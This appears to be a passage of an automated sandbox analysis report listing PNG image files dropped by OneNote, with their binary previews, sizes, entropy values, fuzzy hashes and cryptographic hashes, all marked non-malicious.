                                                                                                                                                                                                                  Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4847
                                                                                                                                                                                                                  Entropy (8bit):7.950192613458318
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                                                                                  MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                                                                                  SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                                                                                  SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                                                                                  SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1657
                                                                                                                                                                                                                  Entropy (8bit):7.80882577056055
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                                                                                  MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                                                                                  SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                                                                                  SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                                                                                  SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2210
                                                                                                                                                                                                                  Entropy (8bit):7.86853667196985
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                                                                                  MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                                                                                  SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                                                                                  SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                                                                                  SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14458
                                                                                                                                                                                                                  Entropy (8bit):7.944094738048628
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                                                                                  MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                                                                                  SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                                                                                  SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                                                                                  SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13030
                                                                                                                                                                                                                  Entropy (8bit):7.948664903731204
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                                                                                  MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                                                                                  SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                                                                                  SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                                                                                  SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3879
                                                                                                                                                                                                                  Entropy (8bit):7.9281351307465044
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                                                                                  MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                                                                                  SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                                                                                  SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                                                                                  SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):19235
                                                                                                                                                                                                                  Entropy (8bit):7.944867159042578
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                                                                                  MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                                                                                  SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                                                                                  SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                                                                                  SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):7374
                                                                                                                                                                                                                  Entropy (8bit):7.955141875077912
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                                                                                  MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                                                                                  SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                                                                                  SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                                                                                  SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):5386
                                                                                                                                                                                                                  Entropy (8bit):7.943706538857394
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                                                                                  MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                                                                                  SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                                                                                  SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                                                                                  SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4181
                                                                                                                                                                                                                  Entropy (8bit):7.950380155401321
                                                                                                                                                                                                                  Encrypted:false
